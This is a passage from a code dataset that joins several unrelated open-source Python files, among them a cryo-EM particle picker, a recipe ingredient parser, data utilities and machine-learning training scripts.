round(num_finished/picker.num_mrcs*100), \"%\"))\n return summary\n \ndef multi_process_micrograph(param):\n \"\"\"\n Process micrographs in parallel, no GPU.\n \"\"\"\n # Unpack parameters (pool.map can map only one argument per function call).\n mrc_file = param[0]\n picker = param[1]\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n summary = process_micrograph(micrograph, picker)\n if picker.verbose: # User requested detailed output.\n num_finished = check_num_finished(picker.output_particles / 'star', picker.start_time)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - picker.start_time)) + \" - Picked %d particles and %d noise images out of %s. (%3d%s)\" %(summary[1], summary[2], summary[0], round(num_finished/picker.num_mrcs*100), \"%\"))\n return summary\n\n \ndef multi_process_micrograph_pool(gpu_index, num_procs, batch, shared_list):\n \"\"\"\n A wrapper function that allows processing many micrographs in parallel using\n a worker pool.\n For each GPU, this function is called in a new process. This process runs\n a pool of workers of size num_procs, all using the same GPU. \n \"\"\"\n for b in batch:\n b.append(gpu_index)\n with mp.Pool(processes=int(num_procs)) as pool:\n shared_list += [x for x in pool.imap_unordered(multi_process_micrograph_gpu, batch, chunksize=7)]\n\ndef get_mrc_batches(params, cpus_per_gpu):\n \"\"\"\n Split the mrc files into batches proportionally sized to the number of\n processes to be run using each GPU.\n \"\"\"\n batches = {}\n gpus = sorted(list(cpus_per_gpu.keys()))\n cpus = np.array([cpus_per_gpu[gpu] for gpu in gpus])\n batch_sizes = np.ceil(len(params) * cpus / np.sum(cpus))\n indices = np.zeros(len(batch_sizes) + 1).astype(int)\n indices[1:] = np.cumsum(batch_sizes).astype(\"int\")\n param_batches = [params[indices[i]:indices[i+1]] for i in range(len(indices)-1)]\n for i in range(len(param_batches)):\n batches[gpus[i]] = param_batches[i]\n return batches\n \ndef main():\n try:\n check_for_newer_version()\n except:\n pass\n # Because of CUDA limitations, it is impossible to fork processes after \n # invoking CUDA. So we need to use 'spawn' start method instead.\n mp.set_start_method('spawn', force=True)\n \n # Get user arguments:\n user_input = argv\n if len(user_input) > 1: # User entered arguments. Use command line mode.\n args = parse_args(HAS_CUPY)\n # Check if user entered the mandatory arguments: input and output \n # directory and particle size. If not, exit.\n if args.output_dir is None or args.input_dir is None or args.particle_size is None:\n print(\"Error: one or more of the following arguments are missing: input-dir, output-dir, particle-size. For help run kltpicker -h\")\n exit()\n else:\n num_finished_output = check_output_dir(Path(args.input_dir), Path(args.output_dir), args.particle_size)\n if num_finished_output == 2:\n print(\"The output directory contains coordinate files for all of the micrographs in the input directory. Aborting...\")\n exit()\n elif num_finished_output == 1:\n pass\n elif num_finished_output == 0:\n print(\"Could not find any .mrc files in %s. \\nExiting...\" % args.input_dir)\n exit(0) \n else:\n if not args.only_do_unfinished:\n print(\"The output directory contains coordinate files for some of the micrographs in the input directory. Use --do-unfinished-only if needed. Aborting...\")\n exit()\n\n else: # User didn't enter arguments, use interactive mode to get arguments.\n args = parse_args(HAS_CUPY) # Initiate args with default values.\n args.input_dir, args.output_dir, args.particle_size, args.num_particles, args.num_noise, args.no_gpu, args.gpus, args.verbose, args.max_processes, args.only_do_unfinished = get_args(HAS_CUPY)\n \n # Handle user options: \n # If max_processes limit not set, set it to infinity.\n if args.max_processes == -1:\n args.max_processes = np.inf\n \n # Find number of .mrc files in input directory. \n # Check if output directory already contains any output coordinate files \n # for the micrographs in the input directory. If so, remove these \n # micrographs from the micrographs to be processed.\n \n mrc_files = check_output_dir(Path(args.input_dir), Path(args.output_dir), args.particle_size)\n if mrc_files == 1: # Need to process all the micrographs in the input dir. \n mrc_files = list(Path(args.input_dir).glob(\"*.mrc\"))\n print(\"\\nRunning on %i files.\" % len(mrc_files))\n \n if not args.no_gpu:\n print(\"Using GPUs %s.\"%(\", \".join([str(x) for x in args.gpus])))\n if not Path(args.output_dir).exists(): # If the output directory doesn't exist, create it.\n Path.mkdir(args.output_dir)\n \n picker = KLTPicker(args) # Initiate picker object.\n picker.num_mrcs = len(mrc_files)\n \n \n # Preprocessing. If using GPU, preprocessing includes the calculation of \n # memory that is taken up in the processing of a single micrograph in the\n # GPU.\n print(\"Preprocessing (usually takes up to 1 minute)...\")\n picker.preprocess()\n params = [[mrc_file, picker] for mrc_file in mrc_files]\n \n if args.no_gpu: # GPU is disabled by user/not available on system.\n print(\"Preprocess finished. Picking particles...\")\n os.environ[\"NUMBA_DISABLE_CUDA\"] = \"1\" # Disable use of CUDA by NUMBA.\n if not picker.verbose: # Display simple progress bar.\n p = mp.Process(target=progress_bar, args=[picker.output_particles / \"star\", len(mrc_files)], name=\"KLTPicker_ProgressBar\")\n p.start() \n # Pick particles. The number of concurrent processes is the minimum of\n # the limit set by the user and two less than the number of CPUs on the machine.\n with mp.Pool(processes=min(args.max_processes, mp.cpu_count() - 2)) as pool:\n # imap creates an iterator so we don't exhaust the machine's memory\n # (as opposed to map). imap_unordered is slightly faster than imap.\n res = [x for x in pool.imap_unordered(multi_process_micrograph, params)] \n\n else: # Using GPU.\n # Calculate the memory usage of the GPU by a single process on one micrograph.\n mem_usage = get_mempool_usage(params[0], args.gpus[0]) \n print(\"Preprocess finished. Picking particles...\")\n \n # Calculate the number of processes to run on each GPU, and partition\n # the micrographs into batches to be passed to each GPU.\n procs_per_gpu = calc_procs_per_gpu(mem_usage, args.max_processes, args.gpus)\n batches = get_mrc_batches(params, procs_per_gpu)\n if not picker.verbose: # Display simple progress bar.\n p = mp.Process(target=progress_bar, args=[picker.output_particles / \"star\", len(mrc_files)], name=\"KLTPicker_ProgressBar\")\n p.start()\n # We have multiple processes writing results to the same \"res\" object,\n # so we need a manager (in the version without GPU the pool function\n # takes care of this).\n manager = mp.Manager()\n res = manager.list()\n # Distribute the batches of micrographs to different processes. Each\n # process runs a pool of workers on its own GPU. The size of each \n # worker pool is according to procs_per_gpu.\n jobs = []\n for i in procs_per_gpu:\n if procs_per_gpu[i]:\n p = mp.Process(target=multi_process_micrograph_pool, args=[i, int(procs_per_gpu[i]), batches[i], res], name=\"KLTPicker%d\"%i)\n jobs.append(p)\n p.start() \n for proc in jobs:\n proc.join()\n \n # Write summary file and print summary to user.\n num_files = len(res)\n num_particles = sum([row[1] for row in res])\n num_noise = sum([row[2] for row in res]) \n print(\"Picked %d particles and %d noise images out of %d micrographs.\" %(num_particles, num_noise, num_files))\n","repo_name":"ShkolniskyLab/kltpicker","sub_path":"kltpicker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"33620368595","text":"from pyramid.view import view_config\nimport logging\nimport json\n\nlog = logging.getLogger(__name__)\n\nfrom wheres_the_beer.lib import config\n\n@view_config(route_name='home', renderer='templates/index.pt')\ndef my_view(request):\n google_maps_key = config.get('google_maps_key')\n return {'google_maps_key': google_maps_key}\n\n@view_config(route_name='old_data', renderer='json')\ndef old_data_view(request):\n when = request.params.get('when')\n if when == 'friday':\n filename = 'wheres_the_beer/static/friday.json'\n elif when == 'weekend':\n filename = 'wheres_the_beer/static/weekend.json'\n elif when == 'today':\n filename = 'wheres_the_beer/static/data.json'\n else:\n return {'data': []}\n the_file = open(filename, 'r')\n data = []\n for line in the_file:\n data.append(json.loads(line))\n the_file.close()\n\n return {'data': data}\n","repo_name":"seanpmcb/wheres_the_beer","sub_path":"wheres_the_beer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71402082970","text":"def find_a(n, sum):\n global ans\n if sum > K:\n return\n\n if n == N:\n if sum == K:\n ans += 1\n return\n\n visit[n] = 0\n find_a(n+1, sum)\n\n visit[n] = 1\n sum += arr[n]\n find_a(n+1, sum)\n\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, K = map(int,input().split())\n arr = list(map(int,input().split()))\n visit = [0] * (N)\n ans = 0\n find_a(0, 0)\n\n print(f'#{t}',ans)","repo_name":"TutiTuti/coding-algorithm","sub_path":"20230829_s2817_부분수열의합_D3.py","file_name":"20230829_s2817_부분수열의합_D3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70287913691","text":"import tensorflow as tf\nfrom tensorflow.contrib import slim\n\nfrom register import backbone_dict\nfrom register import header_dict\nfrom register import loss_dict\nfrom register import nms_dict\nfrom register import anchor_dict\n\ndef forward(ROOT_CFG, num_classes, inputs_image, is_training, backbone_name='SSD', header_name='SSD'):\n if backbone_name not in backbone_dict or header_name not in header_dict:\n return 0\n\n network_cfg = ROOT_CFG.get('network', {})\n backbone_cfg = ROOT_CFG.get('backbone', {})\n header_cfg = ROOT_CFG.get('header', {})\n anchors_cfg = ROOT_CFG.get('anchors', {})\n anchor_func = anchor_dict[ROOT_CFG[\"anchors\"].get('type', 'default')]\n\n print(\"---------start construct backbone---------\")\n with slim.arg_scope(backbone_dict[backbone_name].arg_scope(network_cfg)):\n end_points = backbone_dict[backbone_name].backbone(inputs_image, backbone_cfg, network_cfg, is_training)\n print(\"---------success construct backbone---------\")\n\n print(\"---------start construct header---------\")\n with slim.arg_scope(header_dict[header_name].arg_scope(network_cfg)):\n result = header_dict[header_name].header(end_points, num_classes, header_cfg, network_cfg, [anchors_cfg, anchor_func], is_training)\n print(\"---------success construct header---------\")\n \n return result\n\ndef losses(ROOT_CFG, model_outputs, placeholders, loss_name='normal'):\n if loss_name not in loss_dict:\n return 0\n assert placeholders[2].dtype == tf.int32\n assert placeholders[3].dtype == tf.float32\n assert placeholders[4].dtype == tf.int8\n\n losses_cfg = ROOT_CFG.get('losses', {})\n background_label = ROOT_CFG.get('background_label', 0)\n\n print(\"---------start construct losses---------\")\n r = loss_dict[loss_name].losses(model_outputs[0],\n model_outputs[1],\n model_outputs[2],\n placeholders[2],\n placeholders[3],\n placeholders[4],\n background_label,\n losses_cfg)\n print(\"---------success construct header---------\")\n return r\n\ndef losses_description(loss_name='normal'):\n if loss_name not in loss_dict:\n return 0\n return loss_dict[loss_name].losses_description()\n\ndef postprocessing(ROOT_CFG, num_classes, anchors, model_outputs, postprocessing_name='nms'):\n if postprocessing_name not in nms_dict:\n return 0\n\n background_label = ROOT_CFG.get('background_label', 0)\n postprocessing_cfg = ROOT_CFG.get('postprocessing', {})\n anchors_cfg = ROOT_CFG.get('anchors', {})\n\n print(\"---------start construct postprocessing---------\")\n r = nms_dict[postprocessing_name].postprocessing(model_outputs,\n num_classes,\n anchors,\n background_label,\n postprocessing_cfg,\n anchors_cfg)\n print(\"---------success construct postprocessing---------\") \n return r","repo_name":"lyxzzz/PWSConv_backup","sub_path":"detection_for_voc/python/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21510155195","text":"import nltk\nimport logging\nimport regex as re\nfrom pint import UnitRegistry\n\nnltk.download(\"stopwords\", quiet=True)\n\n\nlogger = logging.getLogger(\"recipedex.ingredient\")\n\nMANUAL_UNITS = \"|\".join([\n \"pinch\",\n \"envelope\",\n \"dash\",\n \"can\",\n \"whole\",\n \"head\",\n \"clove\",\n \"bunch\",\n \"handful\",\n \"piece\",\n \"strip\",\n \"splash\",\n \"stick\"\n])\nSTOP_WORDS = nltk.corpus.stopwords.words('english') + [\n \"small\",\n \"medium\",\n \"large\"\n]\nUREG = UnitRegistry()\n\n\nclass Ingredient(dict):\n\n def __init__(self, value: str):\n '''\n Initialise an Ingredient object by parsing the value string\n\n Parameters:\n value: String version of ingredients\n Returns:\n None\n '''\n super(Ingredient, self).__init__(name=\"\", unit=\"\", quantity=\"\", comment=\"\", optional=False)\n\n # Search for optional text and remove from string\n self[\"optional\"] = \"option\" in value\n value = re.sub(r\"(\\S*option\\S*)\", \"\", value)\n\n # Find comment and remove from string\n self[\"comment\"] = \", \".join(\n re.sub(r\"(\\(|\\)|^,\\s*)\", \"\", i)\n for i in re.findall(r\"(, (?:.+)|\\((?:.+)\\)|(?:or .+))\", value)\n )\n value = re.sub(r\"(, .+)|(\\(.*\\))|(or .*)\", \"\", value)\n\n # Find qunatity and unit by\n try:\n # Quantity followed by unit\n self[\"quantity\"], self[\"unit\"] = re.search(r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", value).groups()\n value = re.sub(r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", \"\", value)\n except: # noqa: E722\n try:\n # Manual unit with no number\n self[\"quantity\"], self[\"unit\"] = \"1\", re.search(r\"(\" + MANUAL_UNITS + r\")\\w*\\s\", value).group(1)\n value = re.sub(r\"(\" + MANUAL_UNITS + r\")\\w*\\s\", \"\", value)\n except: # noqa: E722\n try:\n # Check comment contains number\n self[\"quantity\"], self[\"unit\"] = re.search(\n r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", self[\"comment\"]\n ).groups()\n self[\"comment\"] = re.sub(\n r\"(, )?(\" + self[\"quantity\"] + r\") ?(\" + self[\"unit\"] + r\")(, )?\", \"\", self[\"comment\"]\n )\n except: # noqa: E722\n self[\"quantity\"], self[\"unit\"] = \"\", \"\"\n\n # Crop quantity decimals that are longer than two\n self[\"quantity\"] = re.sub(\n r\"(\\d+\\.\\d{3,})\", lambda q: re.search(r\"(\\d+\\.\\d{0,2})\", q.group()).group(), self[\"quantity\"]\n )\n\n # Parse rest of ingredient\n value = value.strip()\n if len(value) > 0:\n # Unique case where string contains \"to taste\"\n if \"to taste\" in value and len(self[\"unit\"]) == 0:\n self[\"name\"] = re.sub(r\"(\\s?to taste)\", \"\", value)\n self[\"unit\"] = \"to taste\"\n # Else, remove stop words, numbers, and punctuation\n else:\n self[\"name\"] = \" \".join([\n i for i in re.findall(r\"([^\\W\\d_]+)\", value, re.UNICODE) if i not in STOP_WORDS\n ])\n else:\n # Unit must actually be the name (e.g. 2 eggs)\n self[\"name\"], self[\"unit\"] = self[\"unit\"], \"count\"\n\n # Final operations on class variables\n self[\"name\"] = self[\"name\"].lower().capitalize()\n self[\"comment\"] = self[\"comment\"].lower()\n\n def to_unit(self, unit: str):\n '''\n Convert to the new unit, updating the quantity if necessary\n\n Parameters:\n unit: name of the unit to convert to\n\n Returns:\n None\n '''\n try:\n # Parse current ingredient using Pint package\n quantity = UREG.Quantity(float(self[\"quantity\"]), self[\"unit\"])\n\n # Assert new unit can convert from old unit\n assert quantity.check(unit), f\"Cannot convert from '{str(quantity.units)}' to '{unit}'.\"\n quantity = quantity.to(unit)\n\n # Update this object's variables\n self[\"quantity\"] = str(round(quantity.magnitude, 2))\n self[\"unit\"] = str(quantity.units)\n except: # noqa: E722\n logger.warning(f\"Could not convert unit '{self['unit']}' to unit '{unit}'.\")\n\n return self\n\n def to_system(self, system: str):\n '''\n Convert to the new unit system, updating the quantity if necessary\n\n Parameters:\n system: name of the unit system to convert to\n\n Returns:\n None\n '''\n try:\n # Set new default unit system using pint package\n UREG.default_system = system\n\n # Convert this ingredient to the new system\n quantity = UREG.Quantity(float(self[\"quantity\"]), self[\"unit\"])\n quantity = quantity.to_base_units().to_reduced_units()\n\n # Update this object's variables\n self[\"quantity\"] = str(round(quantity.magnitude, 2))\n self[\"unit\"] = str(quantity.units)\n except: # noqa: E722\n logger.warning(f\"Could not convert unit '{self['unit']}' to unit system '{system}'.\")\n\n return self\n\n def to_scale(self, scale: float):\n '''\n Adjust quantity to the new scale, updating the unit if necessary\n\n Parameters:\n scale: amount to scale the quantity by\n\n Returns:\n None\n '''\n # Scale this ingredient and update this object's variables\n self[\"quantity\"] = str(round(float(self[\"quantity\"]) * scale, 2))\n\n return self\n\n def extract_tags(self):\n '''\n Extract the tags from the properties of this ingredient\n\n Parameters:\n None\n\n Returns:\n tags: List of keywords from properties\n '''\n # Extract each word in the name field\n tags = [n.lower() for n in self[\"name\"].split()]\n\n # Remove stop words that appear in the tags list\n def is_readable(tag):\n return not tag.isnumeric() and tag not in nltk.corpus.stopwords.words(\"english\")\n tags = list(filter(is_readable, tags))\n\n return tags\n","repo_name":"edgorman/RecipeDex","sub_path":"recipedex/ingredient.py","file_name":"ingredient.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16465754218","text":"\nfrom collections import Counter\n\n\ndef get_floor_p1(data_str):\n count = Counter(data_str)\n data_dict = dict(count.items())\n return data_dict['('] - data_dict[')']\n\n\ndef get_pos_p2(data_str):\n count = 0\n for idx, chr in enumerate(data_str):\n if chr == '(':\n count += 1\n else:\n count -= 1\n if count == -1:\n return idx + 1\n\n\nwith open('input.in') as f:\n data = f.read()\n print(\"Part 1: {}\".format(get_floor_p1(data)))\n print(\"Part 2: {}\".format(get_pos_p2(data)))\n","repo_name":"DawoudSheraz/advent-of-code-2015","sub_path":"Day 1/day_1.py","file_name":"day_1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10787699620","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n'''\nhttps://www.hackerrank.com/challenges/find-angle/problem?isFullScreen=true\n'''\nimport math\n\nif __name__ == \"__main__\":\n AB = int(input())\n BC = int(input())\n #find the diagonal\n AC = math.sqrt((AB ** 2) + (BC ** 2))\n MC = AC / 2\n #find half length of diagonal\n '''use the sine rule to find angle MCB\n degrees are first converted into radians'''\n MCB = AB * math.sin(math.radians(90)) / AC\n MCB = math.asin(MCB) * 180 * 7 / 22\n # use cosine rule to find length MB\n MB = (MC ** 2 + BC ** 2) - (2 * MC * BC * math.cos(math.radians(MCB)))\n MB = math.sqrt(MB)\n # find angle MBC using sine rule\n MBC = (MC * math.sin(math.radians(MCB))) / MB\n MBC = math.asin(MBC) * 180 * 7 / 22\n # round off to nearest integer\n MBC = round(MBC)\n # the character unicode for degrees is 176\n print(f'{MBC}{chr(176)}')","repo_name":"Mach-web/HackerRank","sub_path":"find_angle_MBC.py","file_name":"find_angle_MBC.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33323344088","text":"from collections import defaultdict\n\nclass MyQuery:\n query = \"\"\n result = []\n columns = []\n\n def __init__(self, command):\n self.query = command\n\n def run(self, cnx):\n cursor = cnx.cursor()\n cursor.execute(self.query)\n self.columns = [desc[0] for desc in cursor.description]\n self.result = cursor.fetchall()\n cursor.close()\n\n def getQuery(self):\n return self.query\n\n def getColumns(self):\n return self.columns\n\n def getResult(self):\n return self.result\n\n #Use a string to pass multiple indices for the key\n def getDataMap(self, keys):\n\n #parse keysString into an array of indices\n keyIndexList = keys.split(',')\n\n # creating a dict of dicts\n datamap = dict()\n c = 0\n for column in self.columns:\n col = column.lower()\n datamap[col] = dict()\n for row in self.result:\n # values = row.split(',')\n values = row\n key = self.getCompositeKey(keyIndexList,values)\n value = values[c]\n datamap[col][key] = value\n c += 1\n return datamap\n\n #Use arbitrary arguments list to pass multiple indices for the key\n def getMap(self, *keyIndexList):\n # creating a dict of dicts\n datamap = dict()\n c = 0\n for column in self.columns:\n col = column.lower()\n datamap[col] = dict()\n for row in self.result:\n values = row\n key = self.getCompositeKey(keyIndexList, values)\n value = values[c]\n datamap[col][key] = value\n c += 1\n return datamap\n\n def getCompositeKey(self, keys, values):\n key = \"\"\n for i in keys:\n v = values[int(i)]\n if v is None: v = \"\"\n key = key + v\n return key\n","repo_name":"uridanan/MyDataReader","sub_path":"MyQuery.py","file_name":"MyQuery.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21120667590","text":"import pymongo\n\nclient = pymongo.MongoClient('mongodb://localhost:27017/')\ndatabase = client[\"film\"]\nsource = database['movie_with_rate']\ndes = database['movie_with_rate_small']\nsource.drop()\n\ncasts = {}\ndirectors = {}\ntypes = {}\neditors = {}\nmovies = []\nfor m in source.find({}).sort([('_id', 1)]):\n if m['casts'] != [] and m['directors'] != [] and m['types'] != '' and m['editors'] != []:\n movies.append(m)\n for c in m['casts']:\n casts[c] = casts.get(c, 0) + 1\n for t in m['types']:\n types[t] = types.get(t, 0) + 1\n for e in m['editors']:\n editors[e] = editors.get(e, 0) + 1\n for d in m['directors']:\n directors[d] = directors.get(d, 0) + 1\n\ncasts_filter = {k: v for k, v in casts.items() if v > 3}\ndirectors_filter = {k: v for k, v in directors.items() if v > 3}\ntypes_filter = {k: v for k, v in types.items() if v > 3}\neditors_filter = {k: v for k, v in editors.items() if v > 3}\n\nprint(len(casts_filter))\nprint(len(directors_filter))\nprint(len(types_filter))\nprint(len(editors_filter))\n\n\ndef fill_list(l, dic):\n res = []\n for li in l:\n if li in dic.keys():\n res.append(li)\n return res\n\n\nfor m in movies:\n ca = fill_list(m['casts'], casts_filter)\n if not ca:\n continue\n\n di = fill_list(m['directors'], directors_filter)\n if not di:\n continue\n\n ty = fill_list(m['types'], types_filter)\n if not ty:\n continue\n\n ed = fill_list(m['editors'], casts_filter)\n if not ed:\n continue\n\n m['casts'] = ca\n m['directors'] = di\n m['types'] = ty\n m['editors'] = ed\n del m['_id']\n\n des.insert_one(m)\n","repo_name":"Gyue15/MovieAnalysis","sub_path":"spider/db_util.py","file_name":"db_util.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21272921587","text":"import subprocess\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom LASExplanation.SHAP import *\nimport os\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import MinMaxScaler\nimport pkg_resources\n\n\ndef main():\n file = pkg_resources.resource_filename('LASExplanation', 'camel-1.2.csv')\n #file = os.path.join(os.getcwd(), 'camel-1.2.csv')\n df = pd.read_csv(file)\n # demo using a software defect prediction dataset\n for i in range(0, df.shape[0]):\n if df.iloc[i, -1] > 0:\n df.iloc[i, -1] = 1\n else:\n df.iloc[i, -1] = 0\n X=df.iloc[:,:-1]\n y=df.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.05)\n sc = MinMaxScaler()\n X_train = pd.DataFrame(sc.fit_transform(X_train), columns=X_train.columns).copy()\n X_test = pd.DataFrame(sc.fit_transform(X_test), columns=X_train.columns).copy()\n clf= RandomForestClassifier()\n # print(subprocess.Popen(\"echo pkw\", shell=True, stdout=subprocess.PIPE).stdout.read())\n # ps = subprocess.Popen(\"type lime_fi.txt\", shell=True,stdout=subprocess.PIPE)\n # print('Text copied.')\n # subprocess.Popen(\"sk.py --text 30 --latex True --higher True\", shell=True,stdin=ps.stdout)\n # print('sk.py called')\n clf.fit(X_train,y_train)\n shap = SHAP(clf=clf,X_test=X_test,X_train=X_train)\n # leave sensitive as none if the data has no fairness concerns\n for i in range(len(X_train.columns)):\n print('Index',i,':',X_train.columns[i])\n shap_values = shap.explain()\n shap.summary_plot()\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kpeng2019/LAS","sub_path":"LASExplanation/tests/testSHAP.py","file_name":"testSHAP.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27010287907","text":"import os\n\nfrom gui import viewmodel\nfrom main import Main\nfrom tkpf import AutoProperty, ViewModel, Bindable\n\n\nclass MainWindow(ViewModel):\n training_set_type = Bindable(AutoProperty('single'))\n available_input_files = Bindable(AutoProperty())\n selected_input_file = Bindable(AutoProperty('Eb_therewill'))\n selected_seed_file = Bindable(AutoProperty())\n available_models = Bindable(AutoProperty())\n selected_model = Bindable(AutoProperty('Feedforward NN'))\n model_order = Bindable(AutoProperty(5))\n epochs = Bindable(AutoProperty(20))\n choruses = Bindable(AutoProperty(3))\n\n def __init__(self):\n super().__init__()\n midis = {os.path.splitext(x)[0] for x in os.listdir('input')}\n changes = {os.path.splitext(x)[0] for x in os.listdir('changes')}\n self.available_input_files = tuple(midis.intersection(changes))\n self.model_naming = {\n 'Markov chain': 'markov',\n 'Feedforward NN': 'neural',\n 'Stateless LSTM': 'lstm_stateless',\n 'Stateful LSTM': 'lstm'\n }\n self.available_models = tuple(self.model_naming.keys())\n self.progressbar_model = viewmodel.KerasProgressbar()\n self.progressbar_model.num_epochs = self.epochs\n\n def observer(val, this):\n if this is self:\n self.progressbar_model.num_epochs = val\n\n type(self).epochs.observers.append(observer)\n\n def run_model_thread_body(self, callback=None):\n keras = None\n model = self.model_naming[self.selected_model]\n try:\n import keras\n if self.training_set_type == 'single':\n Main.single(model, self.selected_input_file, self.choruses, self.model_order, self.epochs, callback)\n elif self.training_set_type == 'weimar':\n Main.weimar(model, self.selected_seed_file, self.choruses, self.model_order, self.epochs, callback)\n except Exception as e:\n if callback:\n callback.error(str(e))\n finally:\n if keras and keras.backend.backend() == 'tensorflow':\n keras.backend.clear_session()\n\n","repo_name":"marczellm/algorimp","sub_path":"gui/viewmodel/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10996664203","text":"# encoding=utf-8\nimport tensorflow as tf\nimport model\nimport data_helper as helper\n\n# 模型超参\ntf.flags.DEFINE_float(\"init_learning_rate\", 0.01, \"initial learning rate\")\ntf.flags.DEFINE_float(\"gpu_fraction\", 0.99, \"gpu fraction\")\n# 训练参数\ntf.flags.DEFINE_integer(\"batch_size\", 32, \"batch size\")\ntf.flags.DEFINE_integer(\"glove_dim\", 300, \"glove dim size\")\ntf.flags.DEFINE_integer(\"num_epochs\", 200, \"number epochs\")\ntf.flags.DEFINE_integer(\"decay_step\", 10, \"number epochs\")\ntf.flags.DEFINE_float(\"decay_rate\", 0.99, \"gpu fraction\")\ntf.flags.DEFINE_string(\"model\", \"nn\", \"model type\")\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\n\n\ndef print_param():\n '''\n 打印超参\n :return:\n '''\n print(\"\\nParameters\")\n for attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\n print(\"\")\n\n\ndef get_placeholder(vocab_size):\n '''\n 创建placeholder\n :param story_maxlen:\n :param query_maxlen:\n :return:\n '''\n input_pl = tf.placeholder(tf.float32, shape=[None, FLAGS.glove_dim * 2], name='input_placeholder')\n label_pl = tf.placeholder(tf.int32, shape=[None, vocab_size], name='label_placeholder')\n learning_rate_pl = tf.placeholder(tf.float32)\n return input_pl, label_pl, learning_rate_pl\n\n\ndef train_and_test(challenge):\n '''\n 训练模型\n :return:\n '''\n train, test = helper.extract_file(challenge)\n vocab, word_idx = helper.get_vocab(train, test)\n vocab_size = len(vocab) + 1 # Reserve 0 for masking via pad_sequences\n x, y = helper.vectorize_stories(train, word_idx)\n tx, ty = helper.vectorize_stories(test, word_idx)\n with tf.Graph().as_default() as graph:\n input_pl, label_pl, learning_rate_pl = get_placeholder(vocab_size)\n # 选择使用的model\n if FLAGS.model == \"nn\":\n used_model = model.NN\n else:\n used_model = model.LR\n lr = used_model(learning_rate_pl, vocab_size)\n logits = lr.inference(input_pl)\n loss = lr.loss(logits, label_pl)\n train_op = lr.train(loss)\n correct = lr.eval(logits, label_pl)\n init = tf.global_variables_initializer()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_fraction)\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options), graph=graph) as sess:\n # 初始化所有变量\n sess.run(init)\n max_test_acc = 0\n step_spam = 0\n current_learning_rate = FLAGS.init_learning_rate\n for i in range(FLAGS.num_epochs):\n batch_id = 1\n if step_spam >= FLAGS.decay_step:\n current_learning_rate = current_learning_rate * FLAGS.decay_rate\n train_gen = helper.generate_data(FLAGS.batch_size, x, y)\n for x_batch, y_batch in train_gen:\n feed_dict = {input_pl: x_batch, label_pl: y_batch, learning_rate_pl: current_learning_rate}\n cost, _ = sess.run([loss, train_op], feed_dict=feed_dict)\n # 每固定批次\n # if batch_id % FLAGS.show_every_n_batches == 0:\n # print ('Epoch {:>3} Batch {:>4} train_loss = {:.3f}'.format(i, batch_id, cost))\n batch_id += 1\n # 每个epoch后,测试一次\n test_gen = helper.generate_data(FLAGS.batch_size, tx, ty)\n total_correct = 0\n total = len(tx)\n for tx_batch, ty_batch in test_gen:\n feed_dict = {input_pl: tx_batch, label_pl: ty_batch, learning_rate_pl: current_learning_rate}\n cor = sess.run(correct, feed_dict=feed_dict)\n total_correct += int(cor)\n acc = total_correct * 1.0 / total\n # 获得max test accuary\n if acc > max_test_acc:\n max_test_acc = acc\n step_spam = 0\n else:\n step_spam += 1\n print (\n 'Epoch{:>3} lr = {:.6f} train_loss = {:.3f} accuary = {:.3f} max_text_acc = {:.3f}'.format(\n i, current_learning_rate, cost, acc, max_test_acc))\n return max_test_acc\n\n\ndef train_process():\n '''\n 训练过程\n :return:\n '''\n print_param()\n prefixs = ['en', 'en-10k']\n tasks = [\n 'qa1_single-supporting-fact', 'qa2_two-supporting-facts', 'qa3_three-supporting-facts',\n 'qa4_two-arg-relations', 'qa5_three-arg-relations', 'qa6_yes-no-questions', 'qa7_counting',\n 'qa8_lists-sets', 'qa9_simple-negation', 'qa10_indefinite-knowledge',\n 'qa11_basic-coreference', 'qa12_conjunction', 'qa13_compound-coreference',\n 'qa14_time-reasoning', 'qa15_basic-deduction', 'qa16_basic-induction', 